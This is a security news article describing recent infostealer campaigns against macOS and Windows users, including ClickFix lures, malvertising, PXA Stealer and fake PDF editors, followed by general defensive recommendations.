macOS Python Infostealers

Cybersecurity specialists are raising alarms over a rapid expansion of information-stealing attacks beyond Microsoft Windows into Apple macOS ecosystems. Threat actors are increasingly relying on cross-platform languages such as Python and abusing trusted services and advertising platforms to distribute malware at scale, significantly broadening the attack surface.

Social Engineering Fuels macOS Infostealer Campaigns

Since late 2025, multiple campaigns have targeted macOS users through social engineering techniques, most notably ClickFix. These operations distribute malicious disk image (DMG) installers that deploy well-known macOS infostealer families, including Atomic macOS Stealer (AMOS), MacSync, and DigitStealer. Delivery often hinges on convincing users to manually initiate the infection process themselves.

Native macOS Abuse and Stealthy Data Theft

Once executed, these threats frequently rely on fileless techniques, native macOS utilities, and AppleScript automation to evade detection and streamline data collection. Stolen information commonly includes browser-stored credentials and session data, sensitive entries from the iCloud Keychain, and developer-related secrets that can enable further compromise.

Malvertising as the Initial Access Vector

Many of these attack chains begin with malicious advertisements, frequently delivered through Google Ads. Users searching for legitimate software, such as DynamicLake utilities or artificial intelligence tools, are redirected to spoofed websites. These sites employ ClickFix lures that instruct victims to follow copy-paste commands or installer prompts, resulting in self-inflicted malware deployment.

Python Stealers Enable Rapid Adaptation

Python-based infostealers are particularly attractive to attackers due to their flexibility and ease of reuse across different operating systems. These threats are commonly distributed via phishing emails and are designed to harvest a wide range of sensitive assets, including:

Login credentials, session cookies, authentication tokens, credit card details, and cryptocurrency wallet data

PXA Stealer and Messaging App Abuse

One notable example is PXA Stealer, attributed to Vietnamese-speaking threat actors. Documented campaigns from October and December 2025 relied on phishing emails for initial access and leveraged registry Run keys or scheduled tasks to maintain persistence. Telegram was used for command-and-control communications and data exfiltration. Separately, threat actors have also weaponized popular messaging platforms such as WhatsApp to distribute malware like Eternidade Stealer, targeting financial and cryptocurrency accounts, a campaign publicly disclosed in November 2025.

SEO Poisoning and Fake Software on Windows

Infostealer activity is not limited to macOS. Parallel campaigns have used fake PDF editors, such as Crystal PDF, promoted through malvertising and search engine optimization poisoning. These Windows-focused attacks deploy credential stealers capable of silently extracting cookies, session information, and cached credentials from Mozilla Firefox and Google Chrome.

Defensive Measures Against Infostealer Operations

To reduce exposure to infostealer threats, organizations are encouraged to implement layered defenses and user awareness initiatives, including:

• Training users to recognize malvertising redirect chains, fraudulent installers, and ClickFix-style prompts
• Monitoring for unusual Terminal activity, unauthorized access to the iCloud Keychain, and suspicious outbound POST requests to newly registered or anomalous domains

Business Impact of Infostealer Compromise

Successful infostealer infections can have far-reaching consequences. Stolen credentials and session data may enable data breaches, unauthorized access to internal systems, business email compromise, supply chain intrusions, and follow-on attacks such as ransomware deployments. Proactive detection and education remain critical to limiting these risks.